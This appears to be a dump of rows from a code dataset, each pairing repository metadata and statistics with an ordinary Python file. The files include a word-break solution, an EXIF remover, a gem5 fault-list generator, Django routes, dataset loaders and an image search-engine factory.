| 33.138889 | 97 | 0.615256 | 145 | 1,193 | 4.993103 | 0.482759 | 0.041436 | 0.016575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007973 | 0.26404 | 1,193 | 35 | 98 | 34.085714 | 0.816629 | 0 | 0 | 0 | 0 | 0 | 0.100587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.16129 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba08622224ba72fb67b9d3ea638e78dc27e3b06 | 1,543 | py | Python | Solutions/022.py | ruppysuppy/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | 70 | 2021-03-18T05:22:40.000Z | 2022-03-30T05:36:50.000Z | Solutions/022.py | ungaro/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | null | null | null | Solutions/022.py | ungaro/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | 30 | 2021-03-18T05:22:43.000Z | 2022-03-17T10:25:18.000Z | """
Problem:
Given a dictionary of words and a string made up of those words (no spaces), return the
original sentence in a list. If there is more than one possible reconstruction, return
any of them. If there is no possible reconstruction, then return null.
For example, given the set of words 'quick', 'brown', 'the', 'fox', and the string
"thequickbrownfox", you should return ['the', 'quick', 'brown', 'fox'].
Given the set of words 'bed', 'bath', 'bedbath', 'and', 'beyond', and the string
"bedbathandbeyond", return either ['bed', 'bath', 'and', 'beyond] or
['bedbath', 'and', 'beyond'].
"""
from typing import List
def get_sentence_split(word_list: List[str], string: str) -> List[str]:
word_set = set()
buffer = ""
words_found = []
# populating the set with the words for O(1) access
for word in word_list:
word_set.add(word)
# searching for words in the string
for char in string:
buffer += char
if buffer in word_set:
words_found.append(buffer)
buffer = ""
# leftover characters in the buffer mean the string could not be fully reconstructed
if buffer or len(words_found) == 0:
return None
return words_found
if __name__ == "__main__":
print(get_sentence_split(["quick", "brown", "the", "fox"], "thequickbrownfox"))
print(
get_sentence_split(
["bed", "bath", "bedbath", "and", "beyond"], "bedbathandbeyond"
)
)
print(get_sentence_split(["quick", "brown", "the", "fox"], "bedbathandbeyond"))
"""
SPECS:
TIME COMPLEXITY: O(characters_in_input_string)
SPACE COMPLEXITY: O(words)
"""
| 28.574074 | 87 | 0.6442 | 206 | 1,543 | 4.68932 | 0.378641 | 0.041408 | 0.066253 | 0.049689 | 0.161491 | 0.076605 | 0.076605 | 0.076605 | 0 | 0 | 0 | 0.00166 | 0.219054 | 1,543 | 53 | 88 | 29.113208 | 0.8 | 0.438756 | 0 | 0.086957 | 0 | 0 | 0.144531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.173913 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba1f94b481fd67f37cb2f9937fc57e408770c9f | 2,872 | py | Python | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | import sys
import argparse
import os
import errno
import piexif
from PIL import Image
def jpg_exif_remove(args):
"""
Removes EXIF data from directory of jpeg images whilst preserving image orientation and quality.
Parameters
----------
in_dir: string, directory containing jpgs to have EXIF removed, default 'images'
out_dir: string, destination directory of cleaned jpgs, default 'images_cleaned'
abs_path: boolean, if True in_dir and out_dir must be full absolute paths
"""
# Set args
in_dir = args.in_dir
out_dir = args.out_dir
abs_path = args.abs_path
# Set paths according to arg boolean
if (abs_path == True):
in_path = in_dir
out_path = out_dir
elif (abs_path == False):
in_path = os.getcwd() + "/" + in_dir + "/"
out_path = os.getcwd() + "/" + out_dir + "/"
else:
print("Option 'abs_path' must be boolean")
# Check if output path exists, create if not
try:
if not os.path.exists(os.path.dirname(out_path)):
os.makedirs(os.path.dirname(out_path))
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Loop through files in input path directory
for filename in os.listdir(in_path):
img = Image.open(in_path + filename)
# Check if image has EXIF data
if "exif" in img.info:
exif_dict = piexif.load(img.info["exif"])
# Check if EXIF data has orientation entry
if piexif.ImageIFD.Orientation in exif_dict["0th"]:
orientation = exif_dict["0th"].pop(piexif.ImageIFD.Orientation)
# Rotate according to orientation entry
if orientation == 2:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 3:
img = img.rotate(180)
elif orientation == 4:
img = img.rotate(180).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 5:
img = img.rotate(-90, expand=True).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 6:
img = img.rotate(-90, expand=True)
elif orientation == 7:
img = img.rotate(90, expand=True).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 8:
img = img.rotate(90, expand=True)
# Save image without EXIF, with max useful quality, no subsampling
img.save(out_path + filename, quality = 95, subsampling = 0)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Open JPEGs in a directory, removes EXIF data and saves to another directory. If default arguments are not used, ALL arguments must be set.")
parser.add_argument("in_dir", nargs='?', type=str, default="images", help="Path to directory of images to have EXIF removed")
parser.add_argument("out_dir", nargs='?', type=str, default="images_cleaned", help="Path of directory to save EXIF removed images too")
parser.add_argument("abs_path", nargs='?', type=bool, default=False, help="Set to true is absolute path to be used")
args = parser.parse_args()
jpg_exif_remove(args)
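# Example invocation (paths illustrative): python jpg_exif_remove.py photos cleaned
# Caveat worth noting: argparse's type=bool treats any non-empty string as True,
# so pass the positional abs_path only when absolute paths are really intended.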
| 31.217391 | 187 | 0.69812 | 425 | 2,872 | 4.578824 | 0.317647 | 0.017986 | 0.036999 | 0.045221 | 0.184995 | 0.16444 | 0.110997 | 0.067831 | 0.067831 | 0.067831 | 0 | 0.011202 | 0.191852 | 2,872 | 91 | 188 | 31.56044 | 0.82723 | 0.230153 | 0 | 0 | 0 | 0.019608 | 0.172382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.098039 | 0 | 0.117647 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba302171ec86e6e932c808425569cf399e3d09e | 385 | py | Python | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | from .conn import BoilerConn
from .controller import WaterColumnController, WaterTempController
from .core import Main
from .reader import WaterColumnReader, WaterTempReader
__all__ = [
'BoilerConn',
'WaterColumnController',
'WaterTempController',
'WaterColumnReader',
'WaterTempReader',
'Main',
]
if __name__ == "__main__":
main = Main()
main.run()
| 20.263158 | 66 | 0.716883 | 32 | 385 | 8.25 | 0.5 | 0.090909 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184416 | 385 | 18 | 67 | 21.388889 | 0.840764 | 0 | 0 | 0 | 0 | 0 | 0.244156 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.266667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba6095505bab7a365504562e670632218328c79 | 2,462 | py | Python | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | import os
import argparse
parser = argparse.ArgumentParser(description = 'gem5 with fault injection')
parser.add_argument('-log', '--log-file', type = str, dest = 'logFile',
help = 'The input file of debug info of Gem5 simulator')
parser.add_argument('-in', '--input-fault', type = str, dest = 'faultFile',
help = 'The input file of faults')
parser.add_argument('-out', '--output-fault', type = str, dest = 'newFaultFile',
help = 'The output file of faults')
args = parser.parse_args()
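# A FaultEntry bundles one injected fault: the stuck-at bit value, fault
# category, target register, bit position, and the simulation tick at which
# the fault becomes active.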
class FaultEntry:
def __init__(self, stuckBit, category, reg, bitPosition, tick):
self.stuckBit = stuckBit
self.category = category
self.reg = reg
self.bitPosition = bitPosition
self.tick = tick
class RegFaultGenerator:
def __init__(self, filename):
try:
self.file = open(filename, "r")
except IOError:
raise
def setFault(self, stuckBit, category, reg, bitPosition, tick):
self.fault = FaultEntry(stuckBit, category, reg, bitPosition, tick)
def haveNext(self):
self.nextLine = self.file.readline().strip()
if self.nextLine == "":
return False
return True
def next(self):
currentLine = self.nextLine.replace(" ","").split(":")
if currentLine[2] == "PseudoInst" and currentLine[4] == "rpns()":
if eval(currentLine[0]) < eval(self.fault.tick):
faultLine = ",".join([self.fault.stuckBit, self.fault.category, self.fault.reg,\
self.fault.bitPosition, currentLine[0], currentLine[0]])
return faultLine
return ""
class FaultParser:
def __init__(self, filename):
try:
self.file = open(filename, "r")
except IOError:
raise
def haveNext(self):
self.nextLine = self.file.readline().strip()
if self.nextLine == "":
return False
if self.nextLine[0] == '#':
return False
return True
def next(self):
currentLine = self.nextLine.replace(" ","")
entries = currentLine.split(",")
return FaultEntry(entries[0], entries[1], entries[2], entries[3], entries[4])
if __name__ == '__main__':
newFaultFP = open(args.newFaultFile, "w")
faultFP = FaultParser(args.faultFile)
lineLabel = 0
while faultFP.haveNext():
fault = faultFP.next()
logFP = RegFaultGenerator(args.logFile)
logFP.setFault(fault.stuckBit, fault.category, fault.reg, fault.bitPosition, fault.tick)
while logFP.haveNext():
newLine = logFP.next()
if not newLine == "":
newFaultFP.write("FAULT" + str(lineLabel) + ":" + newLine + "\n")
lineLabel = lineLabel + 1
newFaultFP.close() | 26.191489 | 90 | 0.68156 | 301 | 2,462 | 5.495017 | 0.299003 | 0.050786 | 0.030834 | 0.054414 | 0.325272 | 0.28295 | 0.28295 | 0.232164 | 0.232164 | 0.232164 | 0 | 0.007324 | 0.168156 | 2,462 | 94 | 91 | 26.191489 | 0.800293 | 0 | 0 | 0.333333 | 0 | 0 | 0.096224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115942 | false | 0 | 0.028986 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba7b4142e2df3a12d460152b808e2562e69558e | 1,362 | py | Python | src/testproject/urls.py | DramaFever/sst | 63d41a102c9d3bdb54019f28a93cff0314a0214f | [
"Apache-2.0"
] | 4 | 2015-01-21T22:20:50.000Z | 2017-12-18T11:38:16.000Z | src/testproject/urls.py | DramaFever/sst | 63d41a102c9d3bdb54019f28a93cff0314a0214f | [
"Apache-2.0"
] | 63 | 2015-01-13T19:32:06.000Z | 2020-04-22T17:01:03.000Z | src/testproject/urls.py | wbdl/sst | 7a2805391fdd390ecb0f488f8377f58381358c89 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, patterns
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
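# NOTE: patterns() with dotted-string view paths is legacy Django (pre-1.8)
# syntax; newer Django versions use plain lists of url()/path() entries with
# view callables instead.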
urlpatterns = patterns('',
# Example:
# (r'^testproject/', include('testproject.foo.urls')),
(r'^static-files/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.STATIC_DOC_ROOT}),
(r'simple', include('testproject.simple.urls')),
(r'begin', 'simple.views.begin'),
(r'longscroll', 'simple.views.longscroll'),
(r'html5', 'simple.views.html5'),
(r'popup', 'simple.views.popup'),
(r'frame_a', 'simple.views.frame_a'),
(r'frame_b', 'simple.views.frame_b'),
(r'alerts', 'simple.views.alerts'),
(r'yui', 'simple.views.yui'),
(r'tables', 'simple.views.tables'),
(r'page_to_save', 'simple.views.page_to_save'),
(r'kill_django', 'simple.views.kill_django'),
(r'', 'simple.views.index'),)
urlpatterns += staticfiles_urlpatterns()
| 43.935484 | 77 | 0.501468 | 129 | 1,362 | 5.178295 | 0.325581 | 0.197605 | 0.041916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002268 | 0.352423 | 1,362 | 30 | 78 | 45.4 | 0.755102 | 0.044787 | 0 | 0 | 0 | 0 | 0.3151 | 0.113251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba819e5829f91fab4b95f7e26b1d2411684036a | 2,017 | py | Python | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | from mmxai.interpretability.classification.torchray.extremal_perturbation.multimodal_extremal_perturbation import *
from mmf.models.mmbt import MMBT
from mmf.models.fusions import LateFusion
from mmf.models.vilbert import ViLBERT
from mmf.models.visual_bert import VisualBERT
from PIL import Image
def torchray_multimodal_explain(image_name, text, model):
print(image_name)
print(text)
image_path = "static/" + image_name
image = Image.open(image_path)
width, height = image.size
image_tensor = image2tensor(image_path)
image_tensor = image_tensor.to((torch.device(
"cuda:0" if torch.cuda.is_available() else "cpu")))
mask_, hist_, output_tensor, summary, conclusion = multi_extremal_perturbation(model,
image_tensor,
image_path,
text,
0,
reward_func=contrastive_reward,
debug=True,
areas=[0.12])
# summary is a higher level explanation in terms of sentence
# conclusion is a list that contains words and their weights
# output_tensor is the masked image
image_tensor = output_tensor.to("cpu")
PIL_image = transforms.ToPILImage()(
imsc(image_tensor[0], quiet=False)[0]).convert("RGB")
    PIL_image = PIL_image.resize((width, height), Image.LANCZOS)  # the Image.ANTIALIAS alias was removed in Pillow 10
name_split_list = image_name.split('.')
exp_image = name_split_list[0] + '_torchray.' + name_split_list[1]
PIL_image.save("static/" + exp_image)
print(summary)
return conclusion, exp_image
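# Usage sketch (hypothetical; assumes an MMF checkpoint is available — the model
# zoo key below is an assumption, not something this module guarantees):
#   model = MMBT.from_pretrained("mmbt.hateful_memes.images")
#   conclusion, exp_image = torchray_multimodal_explain("meme.png", "caption text", model)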
| 46.906977 | 115 | 0.531482 | 196 | 2,017 | 5.244898 | 0.44898 | 0.064202 | 0.050584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008251 | 0.399108 | 2,017 | 42 | 116 | 48.02381 | 0.839934 | 0.074864 | 0 | 0 | 0 | 0 | 0.021482 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.1875 | 0 | 0.25 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba864287e43b24a6ee51f736ea3dfbb9bf7e4ff | 812 | py | Python | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | import pytest
from .util import make_tempdir
from moonpy.util import json_dumps, read_json
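# The `data` fixture is assumed to be defined elsewhere (e.g. in conftest.py) and
# to provide the keys used below: "data", "sorted_file_contents", "file_name",
# "file_contents" and "invalid_file_contents".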
def test_json_dumps_sort_keys(data):
result = json_dumps(data["data"], sort_keys=True)
assert result == data["sorted_file_contents"]
def test_read_json_file(data):
with make_tempdir({data["file_name"]: data["file_contents"]}) as temp_dir:
file_path = temp_dir / data["file_name"]
assert file_path.exists()
data = read_json(file_path)
assert len(data) == 1
assert data["hello"] == "world"
def test_read_json_file_invalid(data):
with make_tempdir({data["file_name"]: data["invalid_file_contents"]}) as temp_dir:
file_path = temp_dir / data["file_name"]
assert file_path.exists()
with pytest.raises(ValueError):
read_json(file_path)
| 30.074074 | 86 | 0.694581 | 117 | 812 | 4.487179 | 0.299145 | 0.091429 | 0.091429 | 0.057143 | 0.464762 | 0.392381 | 0.392381 | 0.392381 | 0.259048 | 0.259048 | 0 | 0.00152 | 0.189655 | 812 | 26 | 87 | 31.230769 | 0.796353 | 0 | 0 | 0.210526 | 0 | 0 | 0.128079 | 0.025862 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.157895 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba92f0037540c51b246e7074e898854f1450755 | 869 | py | Python | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | import re, collections
bot = collections.defaultdict(list)
output = collections.defaultdict(list)
values = open('d10.in').read().splitlines()
pipeline = {}
for value in values:
if value.startswith('value'):
n, b = map(int, re.findall(r'-?\d+', value))
bot[b].append(n)
elif value.startswith('bot'):
who, n1, n2 = map(int, re.findall(r'-?\d+', value))
t1, t2 = re.findall(r' (bot|output)', value)
pipeline[who] = (t1, n1), (t2, n2)
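# Repeatedly hand chips around: any bot holding two chips passes its low/high
# chip to the targets recorded in `pipeline`; eval('bot') / eval('output')
# resolves the destination dict by its name.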
while bot:
for k, v in dict(bot).items():
if len(v) == 2:
v1, v2 = sorted(bot.pop(k))
if v1 == 17 and v2 == 61:
p1 = k
(t1, n1), (t2, n2) = pipeline[k]
eval(t1)[n1].append(v1)
eval(t2)[n2].append(v2)
a, b, c = (output[k][0] for k in [0, 1, 2])
p2 = a * b * c
print('P1:', p1)
print('P2:', p2)
| 24.138889 | 59 | 0.514384 | 132 | 869 | 3.386364 | 0.409091 | 0.060403 | 0.067114 | 0.067114 | 0.098434 | 0.098434 | 0.098434 | 0 | 0 | 0 | 0 | 0.063005 | 0.287687 | 869 | 35 | 60 | 24.828571 | 0.659128 | 0 | 0 | 0 | 0 | 0 | 0.049482 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bab74b4a30cd2de20b8b06675475d7ebf4ce3d0 | 6,063 | py | Python | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | import glob
from torch.utils.data import Dataset
import torchvision.transforms.functional as TF
import torchvision as tv
import xml.etree.ElementTree as ET
from PIL import Image
import numpy as np
import random
import os
from transformers import BertTokenizer
from .utils import nested_tensor_from_tensor_list
MAX_DIM = 299
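# under_max() rescales an image so that its longer side is at most MAX_DIM
# pixels, preserving the aspect ratio.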
def under_max(image):
if image.mode != 'RGB':
image = image.convert("RGB")
    shape = np.array(image.size, dtype=float)  # the np.float alias was removed in NumPy >= 1.24
long_dim = max(shape)
scale = MAX_DIM / long_dim
new_shape = (shape * scale).astype(int)
image = image.resize(new_shape)
return image
class RandomRotation:
def __init__(self, angles=[0, 90, 180, 270]):
self.angles = angles
def __call__(self, x):
angle = random.choice(self.angles)
return TF.rotate(x, angle, expand=True)
def get_all_lines(image_name, ground_truth_folder_dir):
ground_truth_folder_dir = ground_truth_folder_dir
xml_root = ET.parse(
os.path.join(ground_truth_folder_dir, os.path.basename(os.path.splitext(image_name)[0]) + ".xml")).getroot()
results = []
width = int(xml_root.get("width"))
image_handwritten_root = xml_root.find("handwritten-part")
for line in image_handwritten_root.findall("line"):
start_x = int(line.get("asx"))
start_y = int(line.get("asy"))
image_ground_truth = line.get("text")
end_x = int(line.get("dsx"))
end_y = int(line.get("dsy"))
results.append(((start_x, start_y, end_x + width, end_y), image_ground_truth))
return results
class SyntheticIAMImage(Dataset):
def __init__(self, root, max_img_w, max_img_h, max_length, limit, transform, repeat=3,
mode='training'):
super().__init__()
self.root = root
self.max_img_w = max_img_w
self.max_img_h = max_img_h
self.transform = transform
gt_folder_dir = os.path.join(root, 'xml')
gt_lines = []
img_folders = ['formsA-D', 'formsE-H', 'formsI-Z']
for img_folder in img_folders:
for img in os.listdir(os.path.join(root, img_folder)):
img_path = os.path.join(root, img_folder, img)
for (start_x, start_y, end_x, end_y), line_ground_truth in get_all_lines(img_path, gt_folder_dir):
gt_lines.append({
'img_path': img_path,
'line_location': (start_x, start_y, end_x, end_y),
'gt': line_ground_truth
})
self.image_list = []
for _ in range(repeat):
random.shuffle(gt_lines)
index = 0
while index in range(len(gt_lines)):
group_size = random.randint(0, 10)
sub_image_list = []
for grp_index in range(group_size):
if (index + grp_index) >= len(gt_lines):
break
sub_image_list.append(gt_lines[index + grp_index])
self.image_list.append(sub_image_list)
index += group_size
train_set_size = round(len(self.image_list) * 0.8)
if mode == 'validation':
self.image_list = self.image_list[train_set_size:]
if mode == 'training':
self.image_list = self.image_list[: train_set_size]
        self.tokenizer = BertTokenizer.from_pretrained(
            'bert-base-uncased', do_lower_case=True)
self.max_length = max_length + 1
def __len__(self):
return len(self.image_list)
def __getitem__(self, idx):
images, gts = [], []
for line in self.image_list[idx]:
with Image.open(line['img_path']) as img:
start_x, start_y, end_x, end_y = line['line_location']
img = img.crop((start_x, start_y, end_x, end_y))
img = img.convert('RGB')
images.append(img)
gts.append(line['gt'])
image, image_ground_truth = combine_line_image_and_get_ground_truth(self.max_img_w, self.max_img_h,
images, gts)
if self.transform:
image = self.transform(image)
image = nested_tensor_from_tensor_list(image.unsqueeze(0), self.max_img_w, self.max_img_h)
caption_encoded = self.tokenizer.encode_plus(
image_ground_truth, max_length=self.max_length, pad_to_max_length=True, return_attention_mask=True,
return_token_type_ids=False, truncation=True)
caption = np.array(caption_encoded['input_ids'])
cap_mask = (
1 - np.array(caption_encoded['attention_mask'])).astype(bool)
return image.tensors.squeeze(0), image.mask.squeeze(0), caption, cap_mask
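# Stack the resized line crops vertically on a blank page-sized canvas and join
# their transcriptions with newlines to form the page-level ground truth.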
def combine_line_image_and_get_ground_truth(max_w, max_h, sub_line_images, ground_truth):
if len(sub_line_images) == 0:
return Image.new('L', (max_w, max_h), 255), ""
combined_image = Image.new('RGB', (max_w, max_h), (255, 255, 255))
indent_top = random.randint(int(max_h * 0.005), int(max_h * 0.01))
temp_height = indent_top
indent = 0
ref_w, ref_h = int(max_w - indent * 2), int((max_h - indent_top) / 10)
for image in sub_line_images:
width, height = image.size
ratio = min(ref_w / width, ref_h / height)
        resized_image = image.resize((int(width * ratio), int(height * ratio)), Image.LANCZOS)  # ANTIALIAS alias removed in Pillow 10
# Combine line image
width, height = resized_image.size
combined_image.paste(resized_image, (indent, temp_height))
temp_height += height
combined_image = combined_image.convert('L')
return combined_image, '\n'.join(ground_truth)
def build_dataset(config, transforms, mode='training', repeat=3):
data = SyntheticIAMImage(config.iam_dir, config.max_img_w, config.max_img_h,
max_length=config.max_position_embeddings,
limit=config.limit, transform=transforms, mode=mode, repeat=repeat)
return data
| 36.305389 | 116 | 0.61933 | 821 | 6,063 | 4.269184 | 0.233861 | 0.043937 | 0.033381 | 0.017118 | 0.154066 | 0.119829 | 0.115264 | 0.076462 | 0.035378 | 0 | 0 | 0.011328 | 0.271978 | 6,063 | 166 | 117 | 36.524096 | 0.782737 | 0.002969 | 0 | 0 | 0 | 0 | 0.03442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070313 | false | 0 | 0.085938 | 0.007813 | 0.234375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bac90785ee9d2b6b8dbf64e7b92696ce0bb3f65 | 1,177 | py | Python | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | idt/factories.py | Bergolfs/idt | 22a1d19a42b16a87f9045b45805f82efe34885cf | [
"MIT"
] | null | null | null | from idt.duckgo import DuckGoSearchEngine
from idt.bing import BingSearchEngine
from idt.bing_api import BingApiSearchEngine
from idt.flickr_api import FlickrApiSearchEngine
__name__ = "factories"
class SearchEngineFactory:
def __init__(self,data,n_images,folder,verbose,root_folder,size,engine,api_key):
self.data = data
self.n_images = n_images
self.folder = folder
self.verbose = verbose
self.root_folder = root_folder
self.size = size
self.engine = engine
self.api_key = api_key
self.getSearchEngine()
def getSearchEngine(self):
if self.engine == "duckgo":
return DuckGoSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size)
elif self.engine == "bing":
return BingSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size)
elif self.engine == "bing_api":
return BingApiSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size, self.api_key)
elif self.engine == "flickr_api":
return FlickrApiSearchEngine(self.data, self.n_images, self.folder,self.verbose,self.root_folder, self.size, self.api_key)
else:
return None
